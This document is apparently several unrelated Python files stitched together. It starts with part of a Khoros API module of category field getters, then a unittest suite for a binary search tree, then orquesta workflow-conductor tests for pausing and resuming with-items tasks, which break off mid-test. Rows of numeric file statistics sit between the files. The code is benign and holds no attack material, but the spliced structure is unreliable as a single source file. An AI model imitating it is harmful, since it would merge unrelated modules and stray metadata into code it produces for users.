    :type khoros_object: class[khoros.Khoros]
    :param identifier: The Category ID or Category URL with which to identify the category
    :type identifier: str, None
    :param category_details: Previously captured category details (optional)
    :type category_details: dict, None
    :returns: The parent type in string format
    :raises: :py:exc:`khoros.errors.exceptions.GETRequestError`,
             :py:exc:`khoros.errors.exceptions.InvalidFieldError`,
             :py:exc:`khoros.errors.exceptions.InvalidStructureTypeError`,
             :py:exc:`khoros.errors.exceptions.MissingRequiredDataError`
    """
    return get_category_field(khoros_object, 'parent_type', identifier=identifier,
                              category_details=category_details)
def get_parent_id(khoros_object, identifier=None, category_details=None):
    """Retrieve the ID of the parent structure of a category.

    .. versionadded:: 2.1.0

    :param khoros_object: The core :py:class:`khoros.Khoros` object
    :type khoros_object: class[khoros.Khoros]
    :param identifier: The Category ID or Category URL with which to identify the category
    :type identifier: str, None
    :param category_details: Previously captured category details (optional)
    :type category_details: dict, None
    :returns: The parent ID in string format
    :raises: :py:exc:`khoros.errors.exceptions.GETRequestError`,
             :py:exc:`khoros.errors.exceptions.InvalidFieldError`,
             :py:exc:`khoros.errors.exceptions.InvalidStructureTypeError`,
             :py:exc:`khoros.errors.exceptions.MissingRequiredDataError`
    """
    return get_category_field(khoros_object, 'parent_id', identifier=identifier,
                              category_details=category_details)
def get_parent_url(khoros_object, identifier=None, category_details=None):
    """Retrieve the URL of the parent structure of a category.

    .. versionadded:: 2.1.0

    :param khoros_object: The core :py:class:`khoros.Khoros` object
    :type khoros_object: class[khoros.Khoros]
    :param identifier: The Category ID or Category URL with which to identify the category
    :type identifier: str, None
    :param category_details: Previously captured category details (optional)
    :type category_details: dict, None
    :returns: The parent URL in string format
    :raises: :py:exc:`khoros.errors.exceptions.GETRequestError`,
             :py:exc:`khoros.errors.exceptions.InvalidFieldError`,
             :py:exc:`khoros.errors.exceptions.InvalidStructureTypeError`,
             :py:exc:`khoros.errors.exceptions.MissingRequiredDataError`
    """
    return get_category_field(khoros_object, 'parent_view_href', identifier=identifier,
                              category_details=category_details)
def get_root_type(khoros_object, identifier=None, category_details=None):
    """Retrieve the type of the root category above a given category.

    .. versionadded:: 2.1.0

    :param khoros_object: The core :py:class:`khoros.Khoros` object
    :type khoros_object: class[khoros.Khoros]
    :param identifier: The Category ID or Category URL with which to identify the category
    :type identifier: str, None
    :param category_details: Previously captured category details (optional)
    :type category_details: dict, None
    :returns: The root category type in string format
    :raises: :py:exc:`khoros.errors.exceptions.GETRequestError`,
             :py:exc:`khoros.errors.exceptions.InvalidFieldError`,
             :py:exc:`khoros.errors.exceptions.InvalidStructureTypeError`,
             :py:exc:`khoros.errors.exceptions.MissingRequiredDataError`
    """
    return get_category_field(khoros_object, 'root_type', identifier=identifier,
                              category_details=category_details)
def get_root_id(khoros_object, identifier=None, category_details=None):
    """Retrieve the ID of the root category above a given category.

    .. versionadded:: 2.1.0

    :param khoros_object: The core :py:class:`khoros.Khoros` object
    :type khoros_object: class[khoros.Khoros]
    :param identifier: The Category ID or Category URL with which to identify the category
    :type identifier: str, None
    :param category_details: Previously captured category details (optional)
    :type category_details: dict, None
    :returns: The root category ID in string format
    :raises: :py:exc:`khoros.errors.exceptions.GETRequestError`,
             :py:exc:`khoros.errors.exceptions.InvalidFieldError`,
             :py:exc:`khoros.errors.exceptions.InvalidStructureTypeError`,
             :py:exc:`khoros.errors.exceptions.MissingRequiredDataError`
    """
    return get_category_field(khoros_object, 'root_id', identifier=identifier,
                              category_details=category_details)
def get_root_url(khoros_object, identifier=None, category_details=None):
    """Retrieve the URL of the root category above a given category.

    .. versionadded:: 2.1.0

    :param khoros_object: The core :py:class:`khoros.Khoros` object
    :type khoros_object: class[khoros.Khoros]
    :param identifier: The Category ID or Category URL with which to identify the category
    :type identifier: str, None
    :param category_details: Previously captured category details (optional)
    :type category_details: dict, None
    :returns: The root category URL in string format
    :raises: :py:exc:`khoros.errors.exceptions.GETRequestError`,
             :py:exc:`khoros.errors.exceptions.InvalidFieldError`,
             :py:exc:`khoros.errors.exceptions.InvalidStructureTypeError`,
             :py:exc:`khoros.errors.exceptions.MissingRequiredDataError`
    """
    return get_category_field(khoros_object, 'root_view_href', identifier=identifier,
                              category_details=category_details)
def get_language(khoros_object, identifier=None, category_details=None):
    """Retrieve the language configured for a category.

    .. versionadded:: 2.1.0

    :param khoros_object: The core :py:class:`khoros.Khoros` object
    :type khoros_object: class[khoros.Khoros]
    :param identifier: The Category ID or Category URL with which to identify the category
    :type identifier: str, None
    :param category_details: Previously captured category details (optional)
    :type category_details: dict, None
    :returns: The language (e.g. ``en``) in string format
    :raises: :py:exc:`khoros.errors.exceptions.GETRequestError`,
             :py:exc:`khoros.errors.exceptions.InvalidFieldError`,
             :py:exc:`khoros.errors.exceptions.InvalidStructureTypeError`,
             :py:exc:`khoros.errors.exceptions.MissingRequiredDataError`
    """
    return get_category_field(khoros_object, 'language', identifier=identifier,
                              category_details=category_details)
def is_hidden(khoros_object, identifier=None, category_details=None):
    """Indicate whether a category is hidden.

    .. versionadded:: 2.1.0

    :param khoros_object: The core :py:class:`khoros.Khoros` object
    :type khoros_object: class[khoros.Khoros]
    :param identifier: The Category ID or Category URL with which to identify the category
    :type identifier: str, None
    :param category_details: Previously captured category details (optional)
    :type category_details: dict, None
    :returns: Boolean value indicating if the category is hidden
    :raises: :py:exc:`khoros.errors.exceptions.GETRequestError`,
             :py:exc:`khoros.errors.exceptions.InvalidFieldError`,
             :py:exc:`khoros.errors.exceptions.InvalidStructureTypeError`,
             :py:exc:`khoros.errors.exceptions.MissingRequiredDataError`
    """
    return get_category_field(khoros_object, 'hidden', identifier=identifier,
                              category_details=category_details)
def get_views(khoros_object, identifier=None, category_details=None):
    """Retrieve the total view count for a category.

    .. versionadded:: 2.1.0

    :param khoros_object: The core :py:class:`khoros.Khoros` object
    :type khoros_object: class[khoros.Khoros]
    :param identifier: The Category ID or Category URL with which to identify the category
    :type identifier: str, None
    :param category_details: Previously captured category details (optional)
    :type category_details: dict, None
    :returns: The total number of views
    :raises: :py:exc:`khoros.errors.exceptions.GETRequestError`,
             :py:exc:`khoros.errors.exceptions.InvalidFieldError`,
             :py:exc:`khoros.errors.exceptions.InvalidStructureTypeError`,
             :py:exc:`khoros.errors.exceptions.MissingRequiredDataError`
    """
    return get_category_field(khoros_object, 'views', identifier=identifier,
                              category_details=category_details)
def friendly_date_enabled(khoros_object, identifier=None, category_details=None):
    """Indicate whether friendly dates are enabled for a category.

    .. versionadded:: 2.1.0

    :param khoros_object: The core :py:class:`khoros.Khoros` object
    :type khoros_object: class[khoros.Khoros]
    :param identifier: The Category ID or Category URL with which to identify the category
    :type identifier: str, None
    :param category_details: Previously captured category details (optional)
    :type category_details: dict, None
    :returns: Boolean indicating if friendly dates are enabled
    :raises: :py:exc:`khoros.errors.exceptions.GETRequestError`,
             :py:exc:`khoros.errors.exceptions.InvalidFieldError`,
             :py:exc:`khoros.errors.exceptions.InvalidStructureTypeError`,
             :py:exc:`khoros.errors.exceptions.MissingRequiredDataError`
    """
    return get_category_field(khoros_object, 'friendly_date_enabled', identifier=identifier,
                              category_details=category_details)
def get_friendly_date_max_age(khoros_object, identifier=None, category_details=None):
    """Retrieve the maximum age (in days) at which friendly dates are used, if enabled.

    .. versionadded:: 2.1.0

    :param khoros_object: The core :py:class:`khoros.Khoros` object
    :type khoros_object: class[khoros.Khoros]
    :param identifier: The Category ID or Category URL with which to identify the category
    :type identifier: str, None
    :param category_details: Previously captured category details (optional)
    :type category_details: dict, None
    :returns: Integer representing the number of days the friendly date feature should be leveraged if enabled
    :raises: :py:exc:`khoros.errors.exceptions.GETRequestError`,
             :py:exc:`khoros.errors.exceptions.InvalidFieldError`,
             :py:exc:`khoros.errors.exceptions.InvalidStructureTypeError`,
             :py:exc:`khoros.errors.exceptions.MissingRequiredDataError`
    """
    return get_category_field(khoros_object, 'friendly_date_max_age', identifier=identifier,
                              category_details=category_details)
def get_active_skin(khoros_object, identifier=None, category_details=None):
    """Retrieve the skin currently applied to a category.

    .. versionadded:: 2.1.0

    :param khoros_object: The core :py:class:`khoros.Khoros` object
    :type khoros_object: class[khoros.Khoros]
    :param identifier: The Category ID or Category URL with which to identify the category
    :type identifier: str, None
    :param category_details: Previously captured category details (optional)
    :type category_details: dict, None
    :returns: The name of the active skin in string format
    :raises: :py:exc:`khoros.errors.exceptions.GETRequestError`,
             :py:exc:`khoros.errors.exceptions.InvalidFieldError`,
             :py:exc:`khoros.errors.exceptions.InvalidStructureTypeError`,
             :py:exc:`khoros.errors.exceptions.MissingRequiredDataError`
    """
    return get_category_field(khoros_object, 'skin', identifier=identifier,
                              category_details=category_details)
def get_depth(khoros_object, identifier=None, category_details=None):
    """Retrieve the depth of a category within the community structure.

    .. versionadded:: 2.1.0

    :param khoros_object: The core :py:class:`khoros.Khoros` object
    :type khoros_object: class[khoros.Khoros]
    :param identifier: The Category ID or Category URL with which to identify the category
    :type identifier: str, None
    :param category_details: Previously captured category details (optional)
    :type category_details: dict, None
    :returns: The depth of the category as an integer
    :raises: :py:exc:`khoros.errors.exceptions.GETRequestError`,
             :py:exc:`khoros.errors.exceptions.InvalidFieldError`,
             :py:exc:`khoros.errors.exceptions.InvalidStructureTypeError`,
             :py:exc:`khoros.errors.exceptions.MissingRequiredDataError`
    """
    return get_category_field(khoros_object, 'depth', identifier=identifier,
                              category_details=category_details)
def get_position(khoros_object, identifier=None, category_details=None):
    """Retrieve the position of a category relative to its siblings.

    .. versionadded:: 2.1.0

    :param khoros_object: The core :py:class:`khoros.Khoros` object
    :type khoros_object: class[khoros.Khoros]
    :param identifier: The Category ID or Category URL with which to identify the category
    :type identifier: str, None
    :param category_details: Previously captured category details (optional)
    :type category_details: dict, None
    :returns: The position of the category as an integer
    :raises: :py:exc:`khoros.errors.exceptions.GETRequestError`,
             :py:exc:`khoros.errors.exceptions.InvalidFieldError`,
             :py:exc:`khoros.errors.exceptions.InvalidStructureTypeError`,
             :py:exc:`khoros.errors.exceptions.MissingRequiredDataError`
    """
    return get_category_field(khoros_object, 'position', identifier=identifier,
                              category_details=category_details)
def get_creation_date(khoros_object, identifier=None, category_details=None):
    """This function retrieves the creation date of a given category.

    .. versionadded:: 2.1.0

    :param khoros_object: The core :py:class:`khoros.Khoros` object
    :type khoros_object: class[khoros.Khoros]
    :param identifier: The Category ID or Category URL with which to identify the category
    :type identifier: str, None
    :param category_details: Dictionary containing community details (optional)
    :type category_details: dict, None
    :returns: The creation date of the category in string format
    :raises: :py:exc:`khoros.errors.exceptions.GETRequestError`,
             :py:exc:`khoros.errors.exceptions.InvalidFieldError`,
             :py:exc:`khoros.errors.exceptions.InvalidStructureTypeError`,
             :py:exc:`khoros.errors.exceptions.MissingRequiredDataError`
    """
    # TODO: Allow a format to be specified and the ability to parse as a datetime object if needed
    # Fix: the original passed the field name 'get_creation_date' (the function's own name,
    # an apparent copy-paste slip); every other wrapper passes the Mapping field name, which
    # for this attribute is 'creation_date'. NOTE(review): confirm against base.Mapping.
    return get_category_field(khoros_object, 'creation_date', identifier, category_details)
| 47.137736
| 120
| 0.729896
| 3,114
| 24,983
| 5.737636
| 0.072897
| 0.081939
| 0.051715
| 0.079924
| 0.803437
| 0.770918
| 0.74243
| 0.72133
| 0.715285
| 0.712375
| 0
| 0.004128
| 0.17588
| 24,983
| 529
| 121
| 47.226843
| 0.863665
| 0.727014
| 0
| 0
| 0
| 0
| 0.122257
| 0.044072
| 0
| 0
| 0
| 0.00189
| 0
| 1
| 0.316456
| false
| 0
| 0.050633
| 0
| 0.683544
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 0
|
0
| 8
|
b67195136aad1df3ab974de75261ed6ef49d4cd0
| 7,026
|
py
|
Python
|
binary_search_tree/test_binary_search_tree.py
|
akniyev/clrs_solutions
|
691acb8b0dfcc4375b89ae597dfdd6ae342ce7fa
|
[
"MIT"
] | null | null | null |
binary_search_tree/test_binary_search_tree.py
|
akniyev/clrs_solutions
|
691acb8b0dfcc4375b89ae597dfdd6ae342ce7fa
|
[
"MIT"
] | null | null | null |
binary_search_tree/test_binary_search_tree.py
|
akniyev/clrs_solutions
|
691acb8b0dfcc4375b89ae597dfdd6ae342ce7fa
|
[
"MIT"
] | null | null | null |
import unittest
import numpy as np
from .binary_search_tree import *
class TestBinarySearchTree(unittest.TestCase):
    """Unit tests for the BinarySearchTree implementation.

    Improvements over the previous revision:
    * The identical fixture tree that was rebuilt inline in five tests is now
      produced by the ``_sample_tree`` helper (DRY).
    * The repeated insert loop is factored into ``_make_tree``.
    * The random-input tests seed NumPy's RNG so failures are reproducible.
    """

    @staticmethod
    def _make_tree(elements):
        # Build a tree by inserting the elements in iteration order.
        tree = BinarySearchTree()
        for element in elements:
            tree.insert(element)
        return tree

    @staticmethod
    def _sample_tree(with_55=True):
        # Build the fixed sample tree shared by the delete/is_correct tests:
        #
        #            50
        #          /    \
        #        20      70
        #       /  \    /
        #     15    25 60
        #             /  \
        #          [55]   65      (55 present only when with_55 is True)
        node20 = BinarySearchTree.Node.with_children(
            BinarySearchTree.Node.leaf_node(15), 20, BinarySearchTree.Node.leaf_node(25))
        node55 = BinarySearchTree.Node.leaf_node(55) if with_55 else None
        node60 = BinarySearchTree.Node.with_children(node55, 60, BinarySearchTree.Node.leaf_node(65))
        node70 = BinarySearchTree.Node.with_children(node60, 70, None)
        tree = BinarySearchTree()
        tree.root = BinarySearchTree.Node.with_children(node20, 50, node70)
        return tree

    def test_minimum(self):
        np.random.seed(42)  # deterministic inputs for reproducible failures
        for i in range(1, 100):
            elements = np.random.random(i) * 100 - 50
            tree = self._make_tree(elements)
            self.assertEqual(tree.minimum(), min(elements))

    def test_maximum(self):
        np.random.seed(42)
        for i in range(1, 100):
            elements = np.random.random(i) * 100 - 50
            tree = self._make_tree(elements)
            self.assertEqual(tree.maximum(), max(elements))

    def test_tree_structure_basic(self):
        np.random.seed(42)
        for i in range(1, 100):
            elements = np.random.random(i) * 100 - 50
            tree = self._make_tree(elements)
            self.assertEqual(tree.to_sorted_array(), sorted(elements))

    def test_tree_height(self):
        elements_and_heights = [
            ([1, 2, 3, 4, 5, 6], 6),   # fully right-degenerate
            ([6, 5, 4, 3, 2, 1], 6),   # fully left-degenerate
            ([2, 1, 3], 2),            # perfectly balanced
            ([20, 10, 30, 15, 5], 3),
            ([20, 10, 30, 15, 16], 4),
        ]
        for (elements, height) in elements_and_heights:
            tree = self._make_tree(elements)
            self.assertEqual(height, tree.height())

    def test_find(self):
        test_data = [
            ([1, 2, 3, 4, 5, 6], 4, True),
            ([6, 5, 4, 3, 2, 1], 19, False),
            ([2, 1, 3], 54, False),
            ([20, 10, 30, 15, 5], 15, True),
            ([20, 10, 30, 15, 16], 4, False),
        ]
        for (elements, x, answer) in test_data:
            tree = self._make_tree(elements)
            self.assertEqual(tree.find(x), answer)

    def test_successor(self):
        # (elements, value, expected successor value or None for the maximum)
        test_data = [
            ([1, 2, 3, 4, 5, 6], 4, 5),
            ([6, 5, 4, 3, 2, 1], 1, 2),
            ([2, 1, 3], 3, None),
            ([20, 10, 30, 15, 5], 15, 20),
            ([20, 10, 30, 15, 16], 15, 16),
        ]
        for (elements, x, answer) in test_data:
            tree = self._make_tree(elements)
            node = tree.root.find_in_subtree(x)
            successor = node.successor()
            self.assertTrue((successor is None) == (answer is None))
            if successor is not None and answer is not None:
                self.assertTrue(successor.value == answer)

    def test_delete_case1(self):
        # case 1.1: delete a leaf that has a sibling
        tree = self._sample_tree()
        tree.delete(15)
        self.assertEqual(False, tree.find(15))
        # case 1.2: delete a leaf deeper in the right subtree
        tree = self._sample_tree()
        tree.delete(65)
        self.assertEqual(False, tree.find(65))

    def test_delete_case2(self):
        # case 2.1: delete a node with a single (left) child
        tree = self._sample_tree()
        tree.delete(70)
        self.assertEqual(False, tree.find(70))

    def test_delete_case31(self):
        # case 3.1: delete a node with two children
        tree = self._sample_tree()
        tree.delete(20)
        self.assertEqual(False, tree.find(20))

    def test_delete_case32(self):
        # case 3.2: delete the root when the successor is not a direct child
        tree = self._sample_tree(with_55=False)
        tree.delete(50)
        self.assertEqual(False, tree.find(50))

    def test_is_correct(self):
        # A valid BST must satisfy the ordering invariant ...
        tree = self._sample_tree(with_55=False)
        self.assertEqual(True, tree.is_correct())
        # ... whereas 15 placed as the LEFT child of 10 violates it.
        node15 = BinarySearchTree.Node.leaf_node(15)
        node25 = BinarySearchTree.Node.leaf_node(25)
        tree = BinarySearchTree()
        tree.root = BinarySearchTree.Node.with_children(node15, 10, node25)
        self.assertEqual(False, tree.is_correct())
| 33.298578
| 72
| 0.603046
| 817
| 7,026
| 5.077111
| 0.111383
| 0.236258
| 0.144648
| 0.192864
| 0.811234
| 0.762777
| 0.746384
| 0.731437
| 0.731437
| 0.731437
| 0
| 0.091635
| 0.287077
| 7,026
| 211
| 73
| 33.298578
| 0.736474
| 0.01039
| 0
| 0.6
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.093333
| 1
| 0.073333
| false
| 0
| 0.02
| 0
| 0.1
| 0
| 0
| 0
| 0
| null | 1
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
fcab320cbd57f1e9f3857062c6f37d400f560bed
| 37,742
|
py
|
Python
|
orquesta/tests/unit/conducting/test_workflow_conductor_with_items_pause_and_resume.py
|
igcherkaev/orquesta
|
2baa66d33f53cb04b660b3ce284a52d478ecc528
|
[
"Apache-2.0"
] | 85
|
2018-07-26T04:29:49.000Z
|
2022-03-31T10:47:50.000Z
|
orquesta/tests/unit/conducting/test_workflow_conductor_with_items_pause_and_resume.py
|
igcherkaev/orquesta
|
2baa66d33f53cb04b660b3ce284a52d478ecc528
|
[
"Apache-2.0"
] | 149
|
2018-07-27T22:36:45.000Z
|
2022-03-31T10:54:32.000Z
|
orquesta/tests/unit/conducting/test_workflow_conductor_with_items_pause_and_resume.py
|
igcherkaev/orquesta
|
2baa66d33f53cb04b660b3ce284a52d478ecc528
|
[
"Apache-2.0"
] | 24
|
2018-08-07T13:37:41.000Z
|
2021-12-16T18:12:43.000Z
|
# Copyright 2019 Extreme Networks, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from orquesta import conducting
from orquesta.specs import native as native_specs
from orquesta import statuses
from orquesta.tests.unit import base as test_base
class WorkflowConductorWithItemsPauseResumeTest(test_base.WorkflowConductorWithItemsTest):
    def test_pause_item_list_processed(self):
        """One item pauses mid-run; the remaining items complete, so the task
        transitions PAUSING -> PAUSED and the workflow ends in PAUSED."""
        wf_def = """
        version: 1.0

        vars:
          - xs:
              - fee
              - fi
              - fo
              - fum

        tasks:
          task1:
            with: <% ctx(xs) %>
            action: core.echo message=<% item() %>
            next:
              - publish:
                  - items: <% result() %>

        output:
          - items: <% ctx(items) %>
        """

        spec = native_specs.WorkflowSpec(wf_def)
        self.assertDictEqual(spec.inspect(), {})

        conductor = conducting.WorkflowConductor(spec)
        conductor.request_workflow_status(statuses.RUNNING)

        # Mock the action execution for each item and assert expected task statuses.
        task_route = 0
        task_name = "task1"
        task_ctx = {"xs": ["fee", "fi", "fo", "fum"]}
        task_action_specs = [
            {"action": "core.echo", "input": {"message": "fee"}, "item_id": 0},
            {"action": "core.echo", "input": {"message": "fi"}, "item_id": 1},
            {"action": "core.echo", "input": {"message": "fo"}, "item_id": 2},
            {"action": "core.echo", "input": {"message": "fum"}, "item_id": 3},
        ]
        # Item 1 pauses; every other item runs to completion.
        mock_ac_ex_statuses = [
            statuses.SUCCEEDED,
            statuses.PAUSED,
            statuses.SUCCEEDED,
            statuses.SUCCEEDED,
        ]
        expected_task_statuses = [
            statuses.RUNNING,
            statuses.PAUSING,
            statuses.PAUSING,
            statuses.PAUSED,
        ]
        expected_workflow_statuses = [
            statuses.RUNNING,
            statuses.RUNNING,
            statuses.RUNNING,
            statuses.PAUSED,
        ]

        self.assert_task_items(
            conductor,
            task_name,
            task_route,
            task_ctx,
            task_ctx["xs"],
            task_action_specs,
            mock_ac_ex_statuses,
            expected_task_statuses,
            expected_workflow_statuses,
        )

        # Assert the task is not removed from staging (it can still be resumed).
        self.assertIsNotNone(conductor.workflow_state.get_staged_task(task_name, task_route))

        # Assert the workflow is paused.
        self.assertEqual(conductor.get_workflow_status(), statuses.PAUSED)
    def test_pause_item_list_incomplete(self):
        """One item pauses before the final item ever runs; the task and
        workflow still settle into PAUSED with the item list incomplete."""
        wf_def = """
        version: 1.0

        vars:
          - xs:
              - fee
              - fi
              - fo
              - fum

        tasks:
          task1:
            with: <% ctx(xs) %>
            action: core.echo message=<% item() %>
            next:
              - publish:
                  - items: <% result() %>

        output:
          - items: <% ctx(items) %>
        """

        spec = native_specs.WorkflowSpec(wf_def)
        self.assertDictEqual(spec.inspect(), {})

        conductor = conducting.WorkflowConductor(spec)
        conductor.request_workflow_status(statuses.RUNNING)

        # Mock the action execution for each item and assert expected task statuses.
        task_route = 0
        task_name = "task1"
        task_ctx = {"xs": ["fee", "fi", "fo", "fum"]}
        task_action_specs = [
            {"action": "core.echo", "input": {"message": "fee"}, "item_id": 0},
            {"action": "core.echo", "input": {"message": "fi"}, "item_id": 1},
            {"action": "core.echo", "input": {"message": "fo"}, "item_id": 2},
            {"action": "core.echo", "input": {"message": "fum"}, "item_id": 3},
        ]
        # Only three of the four items receive a status; item 3 never runs.
        mock_ac_ex_statuses = [statuses.SUCCEEDED, statuses.PAUSED, statuses.SUCCEEDED]
        expected_task_statuses = [statuses.RUNNING, statuses.PAUSING, statuses.PAUSED]
        expected_workflow_statuses = [statuses.RUNNING, statuses.RUNNING, statuses.PAUSED]

        self.assert_task_items(
            conductor,
            task_name,
            task_route,
            task_ctx,
            task_ctx["xs"],
            task_action_specs,
            mock_ac_ex_statuses,
            expected_task_statuses,
            expected_workflow_statuses,
        )

        # Assert the task is not removed from staging (it can still be resumed).
        self.assertIsNotNone(conductor.workflow_state.get_staged_task(task_name, task_route))

        # Assert the workflow is paused.  (Previous comment wrongly said "canceled".)
        self.assertEqual(conductor.get_workflow_status(), statuses.PAUSED)
    def test_resume_paused_item_list_processed(self):
        """Pause an item mid-run, then resume and complete it; the task and
        workflow should transition back through RUNNING to SUCCEEDED."""
        wf_def = """
        version: 1.0

        vars:
          - xs:
              - fee
              - fi
              - fo
              - fum

        tasks:
          task1:
            with: <% ctx(xs) %>
            action: core.echo message=<% item() %>
            next:
              - publish:
                  - items: <% result() %>

        output:
          - items: <% ctx(items) %>
        """

        spec = native_specs.WorkflowSpec(wf_def)
        self.assertDictEqual(spec.inspect(), {})

        conductor = conducting.WorkflowConductor(spec)
        conductor.request_workflow_status(statuses.RUNNING)

        # Mock the action execution for each item and assert expected task statuses.
        task_route = 0
        task_name = "task1"
        task_ctx = {"xs": ["fee", "fi", "fo", "fum"]}
        task_action_specs = [
            {"action": "core.echo", "input": {"message": "fee"}, "item_id": 0},
            {"action": "core.echo", "input": {"message": "fi"}, "item_id": 1},
            {"action": "core.echo", "input": {"message": "fo"}, "item_id": 2},
            {"action": "core.echo", "input": {"message": "fum"}, "item_id": 3},
        ]
        # Item 1 pauses; every other item runs to completion.
        mock_ac_ex_statuses = [
            statuses.SUCCEEDED,
            statuses.PAUSED,
            statuses.SUCCEEDED,
            statuses.SUCCEEDED,
        ]
        expected_task_statuses = [
            statuses.RUNNING,
            statuses.PAUSING,
            statuses.PAUSING,
            statuses.PAUSED,
        ]
        expected_workflow_statuses = [
            statuses.RUNNING,
            statuses.RUNNING,
            statuses.RUNNING,
            statuses.PAUSED,
        ]

        self.assert_task_items(
            conductor,
            task_name,
            task_route,
            task_ctx,
            task_ctx["xs"],
            task_action_specs,
            mock_ac_ex_statuses,
            expected_task_statuses,
            expected_workflow_statuses,
        )

        # Assert the task is not removed from staging (it can still be resumed).
        self.assertIsNotNone(conductor.workflow_state.get_staged_task(task_name, task_route))

        # Assert the workflow is paused.  (Previous comment wrongly said "succeeded".)
        self.assertEqual(conductor.get_workflow_status(), statuses.PAUSED)

        # Resume the paused action execution.
        self.forward_task_item_statuses(conductor, task_name, 1, [statuses.RUNNING])

        # Assert the task and workflow is running.
        actual_task_status = conductor.workflow_state.get_task(task_name, task_route)["status"]
        self.assertEqual(actual_task_status, statuses.RUNNING)
        staged_task = conductor.workflow_state.get_staged_task(task_name, task_route)
        self.assertIsNotNone(staged_task)
        self.assertIn("items", staged_task)
        self.assertEqual(staged_task["items"][1]["status"], statuses.RUNNING)
        self.assertEqual(conductor.get_workflow_status(), statuses.RUNNING)

        # Complete the resumed action execution.
        self.forward_task_item_statuses(
            conductor, task_name, 1, [statuses.SUCCEEDED], result=task_ctx["xs"][1]
        )

        # Assert the task is removed from staging once all items are processed.
        self.assertIsNone(conductor.workflow_state.get_staged_task(task_name, task_route))

        # Assert the task and workflow succeeded.
        actual_task_status = conductor.workflow_state.get_task(task_name, task_route)["status"]
        self.assertEqual(actual_task_status, statuses.SUCCEEDED)
        self.assertEqual(conductor.get_workflow_status(), statuses.SUCCEEDED)
def test_pause_workflow_using_pausing_status_with_items_active(self):
    """Request PAUSING while every with-items action is still running.

    The task and workflow transition to PAUSING, settle at PAUSED once all
    four items complete, and a RESUMING request on the fully completed task
    drives the workflow straight to SUCCEEDED.
    """
    wf_def = """
version: 1.0
vars:
- xs:
- fee
- fi
- fo
- fum
tasks:
task1:
with: <% ctx(xs) %>
action: core.echo message=<% item() %>
next:
- publish:
- items: <% result() %>
output:
- items: <% ctx(items) %>
"""
    spec = native_specs.WorkflowSpec(wf_def)
    self.assertDictEqual(spec.inspect(), {})
    conductor = conducting.WorkflowConductor(spec)
    conductor.request_workflow_status(statuses.RUNNING)
    # Mock the action execution for each item and assert expected task statuses.
    task_route = 0
    task_name = "task1"
    task_ctx = {"xs": ["fee", "fi", "fo", "fum"]}
    task_action_specs = [
        {"action": "core.echo", "input": {"message": "fee"}, "item_id": 0},
        {"action": "core.echo", "input": {"message": "fi"}, "item_id": 1},
        {"action": "core.echo", "input": {"message": "fo"}, "item_id": 2},
        {"action": "core.echo", "input": {"message": "fum"}, "item_id": 3},
    ]
    # Verify the set of action executions.
    expected_task = self.format_task_item(
        task_name,
        task_route,
        task_ctx,
        conductor.spec.tasks.get_task(task_name),
        actions=task_action_specs,
        items_count=len(task_ctx["xs"]),
    )
    expected_tasks = [expected_task]
    actual_tasks = conductor.get_next_tasks()
    self.assert_task_list(conductor, actual_tasks, expected_tasks)
    # Set the items to running status.
    for i in range(0, len(task_ctx["xs"])):
        self.forward_task_item_statuses(conductor, task_name, i, [statuses.RUNNING])
    # Assert that the task is running.
    actual_task_status = conductor.workflow_state.get_task(task_name, task_route)["status"]
    self.assertEqual(actual_task_status, statuses.RUNNING)
    # Pause the workflow. With items still active, the pause is deferred (PAUSING).
    conductor.request_workflow_status(statuses.PAUSING)
    self.assertEqual(conductor.get_workflow_status(), statuses.PAUSING)
    actual_task_status = conductor.workflow_state.get_task(task_name, task_route)["status"]
    self.assertEqual(actual_task_status, statuses.PAUSING)
    # Complete the items.
    for i in range(0, len(task_ctx["xs"])):
        result = task_ctx["xs"][i]
        status_changes = [statuses.SUCCEEDED]
        self.forward_task_item_statuses(conductor, task_name, i, status_changes, result=result)
    # Assert the task succeeded but the workflow settles at PAUSED (pause was pending).
    actual_task_status = conductor.workflow_state.get_task(task_name, task_route)["status"]
    self.assertEqual(actual_task_status, statuses.SUCCEEDED)
    self.assertEqual(conductor.get_workflow_status(), statuses.PAUSED)
    # Resume the workflow; nothing is left to run, so it completes.
    conductor.request_workflow_status(statuses.RESUMING)
    self.assertEqual(conductor.get_workflow_status(), statuses.SUCCEEDED)
def test_pause_workflow_using_paused_status_with_items_active(self):
    """Request PAUSED (not PAUSING) while every with-items action is running.

    Same flow as the PAUSING variant: because items are still active, the
    requested PAUSED is downgraded to PAUSING until the items complete.
    """
    wf_def = """
version: 1.0
vars:
- xs:
- fee
- fi
- fo
- fum
tasks:
task1:
with: <% ctx(xs) %>
action: core.echo message=<% item() %>
next:
- publish:
- items: <% result() %>
output:
- items: <% ctx(items) %>
"""
    spec = native_specs.WorkflowSpec(wf_def)
    self.assertDictEqual(spec.inspect(), {})
    conductor = conducting.WorkflowConductor(spec)
    conductor.request_workflow_status(statuses.RUNNING)
    # Mock the action execution for each item and assert expected task statuses.
    task_route = 0
    task_name = "task1"
    task_ctx = {"xs": ["fee", "fi", "fo", "fum"]}
    task_action_specs = [
        {"action": "core.echo", "input": {"message": "fee"}, "item_id": 0},
        {"action": "core.echo", "input": {"message": "fi"}, "item_id": 1},
        {"action": "core.echo", "input": {"message": "fo"}, "item_id": 2},
        {"action": "core.echo", "input": {"message": "fum"}, "item_id": 3},
    ]
    # Verify the set of action executions.
    expected_task = self.format_task_item(
        task_name,
        task_route,
        task_ctx,
        conductor.spec.tasks.get_task(task_name),
        actions=task_action_specs,
        items_count=len(task_ctx["xs"]),
    )
    expected_tasks = [expected_task]
    actual_tasks = conductor.get_next_tasks()
